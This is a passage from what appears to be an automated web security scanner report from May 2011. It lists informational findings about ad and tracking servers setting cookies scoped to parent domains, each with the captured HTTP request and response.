Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3629939364375984&output=html&h=600&slotname=1110596607&w=160&lmt=1305207196&flash=10.2.154&url=http%3A%2F%2Fwww.milehighonthecheap.com%2F2011%2F05%2Fno-foolin-free-cat-friday-adoption-special-in-boulder%2F&dt=1305207070545&bpp=2&shv=r20110427&jsv=r20110427&prev_slotnames=0912670945%2C1110596607&correlator=1305207063071&frm=0&adk=3981566363&ga_vid=1163999256.1305207063&ga_sid=1305207063&ga_hid=2055703132&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1004&bih=934&fu=0&ifi=3&dtd=114&xpc=HVEaewoQQ1&p=http%3A//www.milehighonthecheap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305129711; ts=1305129714

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:14 GMT
Set-Cookie: mt_mop=4:1305207074; domain=.mathtag.com; path=/; expires=Sun, 11 May 2014 13:31:14 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Thu, 12 May 2011 13:31:10 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x2, ord-bidder-x1
Server: MMBD/3.5.5
Content-Length: 896
Content-Type: text/html
Connection: keep-alive

<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/I36/jview/268359963/direct/01/254397468447254047?click=http://pixel.mathtag.com/click/img%3Fmt_aid%3D254397468447254047%
...[SNIP]...
8.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344481&PluID=0&w=300&h=250&ord=2310578&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/w%3B236732442%3B0-0%3B0%3B31555527%3B4307-300/250%3B41285215/41303002/1%3B%3B%7Eaopt%3D2/1/81/0%3B%7Esscs%3D%3f$$&z=800 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=46317853808868680
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001klD7aM7G077T00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA90N.0000000001uB9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001klD7aM7G077T00001jFT.aLQg0duS00001kgh7aLQg02WG00001jpA4aM9n0bdR00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001iLzpaM7607l000001; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB8Yox0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA90N.0000000001uB910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 09:28:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:27:59 GMT
Connection: close
Content-Length: 2847

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
8.33. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?bapid=6388&uid=768910&kid=43105999 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AXZHbkoMgEET%2FhWceAEWt%2FE2Md24CitGQfw%2BQ3Vrd1zPdPdM1L%2BAIuL0Aa%2FdNmcaCGzAbF6vHWtiy9NgjGIGNYC6bBB7DUPUa3V2AvF%2BEJ76GdhxlFlU1SjaPJ4aiVlJG6NJ%2FR23QkgZqnR1bIFVmeCCYBh0vxp1OgZrccfWzKJk7dTH%2FUnGhlrecB1Ivm%2FKlL%2BoMznKzLuVZdMmT%2F%2FLi6iKPtEErP3cc5gCPafgWn59Oh7HBk8sTsCxbokJoiVPpXCj0Z1ZnsxFKpiK6qc7XjPTag1gTsua9k9LfPcbLAW3VFSLupdPzfF1LonVA%2FSmvKB%2FXPIbJmryMRhmAoL5L2ZoxfRu83x8%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Thu, 12 May 2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.34. http://cm.npc-gatehouse.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-gatehouse.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=5970914500&type=news&keywordCharEnc=utf8&mkt=us&source=npc_gatehouse_mysuburbanlife_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&outputCharEnc=utf8&tg=1&bc=dbdbdb&cc=ffffff&lc=000000&tc=666666&uc=666666&du=1&cb=1305207048874&ctxtContent=%3Chead%3E%0A%09%09%0A%09%09%09%3Cbase%20href%3D%22http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%22%3E%0A%09%09%0A%09%09%0A%09%09%09%3Ctitle%3ETo%20do%20tonight%3A%20Watch%20'American%20Idol'%3B%20%22Priest%22%20opens%20Friday%20the%2013th%20%20-%20Lyons%2C%20IL%20-%20Lyons%20Suburban%20Life%3C%2Ftitle%3E%0A%09%09%0A%09%09%0A%09%09%3Cmeta%20content%3D%22Lyons%20Suburban%20Life%20-%20%0A%09Your%20daily%20entertainment%20update%20with%20items%20on%20%26amp%3Bquot%3BAmerican%20Idol%26amp%3Bquot%3B%20tonight%20on%20Fox%2C%20%26amp%3Bquot%3BPriest%26amp%3Bquot%3B%20opening%20on%20Friday%20the%2013th%20and%20a%20recipe%20 HTTP/1.1
Host: cm.npc-gatehouse.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczEwNzU1MACxpU6ww=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczE7ygI5tUAA1eCw==; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:13 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4749


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
8.35. http://cm.npc-scripps.overture.com/js_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-scripps.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=7894763060&type=entertainment&ctxtId=entertainment&keywordCharEnc=utf8&source=npc_scripps_courierpress_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&css_url=http://media.scrippsnewspapers.com/yahoo/yahoo_cm.css&du=1&cb=1305207046691&ctxtContent=%3C!--%0A%20%20%0A%20%20%20%20%0A%20%20%20%20ROLE%20%3D%20prod.%0A--%3E%3Chead%3E%0A%09%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09var%20jSINGconf%20%3D%20%7B%7D%3B%0A%09%09%09jSINGconf.theme%20%3D%20%7B%0A%09%09%09%09%0A%09%09%09%09%09CITY%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press'%2C%0A%09%09%09%09%0A%09%09%09%09%09VIDEO_MEDIA_URL%3A%20'http%3A%2F%2Fmedia.scrippsnewspapers.com%2Fcorp_assets%2Fasphalt'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_MEDIA_URL%3A%20'http%3A%2F%2Fweb.courierpress.com%2Fstatic%2Fecp%2Fasphalt%2Fprod'%2C%0A%09%09%09%09%0A%09%09%09%09%09REGION%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09MOBILE_SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press%20Mobile'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_URL%3A%20'http%3A%2F%2Fwww HTTP/1.1
Host: cm.npc-scripps.overture.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDFzcLUwNnC2MAc2BU%2bQw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczE2MLZxcAA2xUBA0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:07 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
8.36. http://core.insightexpressai.com/adServer/adServerESI.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=175391&siteID=312545312&creativeID=208464546 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1; IXAIBanners2579=178140,178140,178140,178140,178140; IXAIBannerCounter178140=5; IXAILastHit2579=5%2f11%2f2011+10%3a28%3a40+AM; IXAICampaignCounter2579=5; IXAIBanners2554=175183,175237; IXAIBannerCounter175237=1; IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; IXAICampaignCounter2554=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 8
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2579=178140,178140,178140,178140,178140,178406; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178406=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f12%2f2011+9%3a29%3a08+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=6; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 12 May 2011 13:30:22 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 13:30:22 GMT
Connection: close
Cache-Control: no-store


8.37. http://dw.zdnet.com/clear/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.zdnet.com
Path:   /clear/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clear/c.gif?ts=1305206958782057&clgf=Cg8JIk24ijttAAAASDs HTTP/1.1
Host: dw.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=11603627.1305206897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11603627.345061338.1305206897.1305206897.1305206897.1; __utmc=11603627; __utmb=11603627.2.10.1305206897; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10087&ASK05540_10174&ASK05540_10185&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10283&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10342&ASK05540_10343&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10432&ASK05540_10458&ASK05540_10537&ASK05540_10538&ASK05540_10562&ASK05540_10265&ASK05540_10166&ASK05540_10249&ASK05540_10263&ASD08734_72078

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:23 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Set-Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs; expires=Tue, 11-May-2021 13:31:23 GMT; domain=.zdnet.com; path=/
Content-Length: 42
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cneonction: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
8.38. http://ewsnewspapers.112.2o7.net/b/ss/ews.h.evansville/1/H.22.1/s22444411469623  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ewsnewspapers.112.2o7.net
Path:   /b/ss/ews.h.evansville/1/H.22.1/s22444411469623

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ews.h.evansville/1/H.22.1/s22444411469623?AQB=1&ndh=1&t=12%2F4%2F2011%208%3A30%3A39%204%20300&ce=UTF-8&pageName=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&g=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&cc=USD&ch=ENTERTAINMENT&events=event1&h1=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&h2=ews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c3=ECP&c4=DJEFF&c6=LOCAL&c7=ARTICLE&c8=HEDER-HERE-IN-THIS-SPP-PPPPP&c10=courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&c16=Entertainment%20(NPC)&c19=ECP%3Aews.h.evansville%3AENTERTAINMENT%3ALOCAL%3AARTICLE%3AHEDER-HERE-IN-THIS-SPP-PPPPP&c25=8%3A00AM&c26=Thursday&c27=Weekday&c30=ECP&c43=Evansville%20Courier%20%26%20Press%20and%20Evansville%20Courier%20%26%20Press&c44=1&c45=5&c50=Entertainment%2FLocal&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1020&bh=950&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: ewsnewspapers.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
